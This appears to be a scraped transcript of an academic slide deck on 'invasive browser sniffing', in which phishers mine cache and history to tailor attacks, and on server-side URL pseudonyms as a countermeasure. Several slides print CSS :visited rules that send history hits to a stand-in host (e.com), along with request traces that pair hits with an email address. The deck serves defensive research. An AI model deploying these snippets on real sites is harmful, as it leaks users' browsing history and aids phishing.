Invasive browser sniffing and countermeasures
This presentation is the property of its rightful owner.
Sponsored Links
1 / 39

Invasive Browser Sniffing and Countermeasures PowerPoint PPT Presentation


  • 123 Views
  • Uploaded on
  • Presentation posted in: General

Invasive Browser Sniffing and Countermeasures. Markus Jakobsson & Sid Stamm. Context Aware Attacks. Data about targets obtained Used to customize emails Yields higher vulnerability rate. Context: Social Networks. Mine site for relationships (Alice knows Bob)

Download Presentation

Invasive Browser Sniffing and Countermeasures

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Invasive browser sniffing and countermeasures

Invasive Browser Sniffing and Countermeasures

Markus Jakobsson & Sid Stamm


Context aware attacks

Context Aware Attacks

Data about targets obtained

Used to customize emails

Yields higher vulnerability rate


Context social networks

Context: Social Networks

  • Mine site for relationships(Alice knows Bob)

  • Spoof email from victim’s friend

  • People trust their friends (and that which spoofs them)


Context browser recon

Context: Browser-Recon

  • Phisher mines browsers

    • Browsing history

    • Cached data

  • Attacker can discover affiliations

  • Easy to pair browser history with email address


Context cache recon

GET /index.html

GET /pics/pic1.jpg

GET /pics/pic2.jpg

Context: Cache Recon

Pic1.jpg is Not in Cache

(pic1.jpg is not cached)


Context cache recon1

GET /index.html

Context: Cache Recon

Pic1.jpg IS in Cache

(pic1.jpg is cached)


Context cache recon2

GET pic1.jpg

GET logout.jpg

GET pic2.jpg

Context: Cache Recon

(Felten & Schneider, “Timing Attacks on Web Privacy”7th ACM Conference in Computer & Communication Security, 2000.)


Context history recon

Context: History Recon

What You See:

The Code:

<style>

a { color: blue; }

#id1:visited { color: red; }

#id2:visited { color: red; }

#id3:visited { color: red; }

</style>

<a id=id1 href=“x.com”>Link 1</a>

<a id=id2 href=“y.com”>Link 2</a>

<a id=id3 href=“z.com”>Link 3</a>

Link 1

Link 2

Link 3


Context history recon1

Context: History Recon

What You See:

The Code:

<style>

a { color: blue; }

#id1:visited {

background: url(‘e.com/?id=1’);

}

#id2:visited {

background: url(‘e.com/?id=2’);

}

</style>

<a id=id1 href=“x.com”>Link 1</a>

<a id=id2 href=“y.com”>Link 2</a>

<a id=id3 href=“z.com”>Link 3</a>

Link 1

Link 2

Link 3


Context history recon2

Context: History Recon

What You See:

The Code:

<style>

a { color: blue; }

#id1:visited {

background: url(‘e.com/?id=1’);

}

#id2:visited {

background: url(‘e.com/?id=2’);

}

</style>

<a id=id1 href=“x.com”></a>

<a id=id2 href=“y.com”></a>

<a id=id3 href=“z.com”></a>


History recon email

GET [email protected]

(lots of links)

GET /hit?id=1&[email protected]

GET /hit?id=42&[email protected]

Phisher can nowassociate Alice withlink 1 and 42

History Recon + Email

Auto-Fill Identity Extraction


Chameleon attack

“Chameleon” Attack


Solutions to browser recon

Solutions to Browser-recon

  • Client-Side Solutions:

    • Jackson, Bortz, Boneh Mitchell, “Protecting browser state from web privacy attacks”, To appear in WWW06, 2006.

    • CSS limiting

    • “User-Paranoia” (regularly clear history, cache, keep no bookmarks)

  • Server-Side Solution:

    • Make URLs impossible to guess


Solution goals

Solution Goals

Requirements

  • Hard to guess any pages or resources served by SP

  • Search engines can still index and search SP


Formal goal specification

Formal Goal Specification


Formal goal specification1

Formal Goal Specification


Solution techniques

Solution Techniques

  • Two techniques:

    • Customize URLs with pseudonymshttp://chase.com/page.html?39fc938f

    • Pollute Client State (fill cache/history with related sites not visited by client)

  • Hiding vs. obfuscating

    • Internal (protected) URLs hidden

    • Entry point (public) URLs obfuscated


Solution to browser recon

S

Solution to Browser-recon

GET /

C


Solution to browser recon1

T

ST

SB

Solution to Browser-recon

GET /?13fc021b

GET /

C

Domain of S


Pseudonyms

Pseudonyms

  • Establishing a pseudonym

  • Using a pseudonym

  • Pseudonym validity check

    • Via Cookies

    • Via HTTP-REFERER

    • Via Message Authentication Codes


Pseudonyms1

Pseudonyms

  • Robot Policies

    • Dealing with search engines

    • Robots.txt “standard” (no problem if cheating)

  • Pollution Policy

    • Pollute entrance URLs

    • How to choose pollutants?

  • What about links to offsite data?

  • Bookmarks?


Example

GET /page.html?83fa029

GET /page.html

Example

Bank.com

10.0.0.1

C


Example1

Example

<a href=‘http://www.g.com’>Go to G</a>

<a href=‘http://10.0.0.1/login.jsp’>Log in</a>

<img src=‘/img/hi.gif’>

hm

Bank.com

10.0.0.1

C


Example2

Example

<a href=‘http://www.g.com’>Go to G</a>

<a href=‘http://Bank.com/login.jsp’>Log in</a>

<img src=‘/img/hi.gif’>

hm

Bank.com

10.0.0.1

C


Example3

Example

<a href=‘http://Bank.com/redir?www.g.com’>Go to G</a>

<a href=‘http://Bank.com/login.jsp’>Log in</a>

<img src=‘/img/hi.gif’>

hm

Bank.com

10.0.0.1

C


Example4

Example

<a href=‘http://Bank.com/redir?www.g.com?83fa029’>Go to G</a>

<a href=‘http://Bank.com/login.jsp?83fa029’>Log in</a>

<img src=‘/img/hi.gif?83fa029’>

hm

Bank.com

10.0.0.1

C


Example5

Example

<a href=‘http://Bank.com/redir?www.g.com?83fa029’>Go to G</a>

<a href=‘http://Bank.com/login.jsp?83fa029’>Log in</a>

<img src=‘/img/hi.gif?83fa029’>

T

Bank.com

10.0.0.1

C


Client s perception

Client’s Perception


Policies

Policies

  • Offsite Redirection Policy

  • Data Replacement Policy

  • Client vs. Robot Distinction


Special cases

Special Cases

Shared/Transfer Pseudonyms

Cache pollution reciprocity


Prototype details

SB

ST

Prototype Details

  • Java App simulating an HTTP server

  • Pseudonyms: 64-bit random number

    • java.security.SecureRandom

  • Experimental Client:

    • Shell script + CURL


Experimental results

Experimental Results


Experimental results1

Experimental Results


Experimental results2

Experimental Results


Experimental results3

Experimental Results


General considerations

General Considerations

  • Forwarding user-agent

  • Translate Cookies

  • Optimizations


Invasive browser sniffing and countermeasures1

?

Invasive Browser Sniffing and Countermeasures

Markus Jakobsson & Sid Stamm


  • Login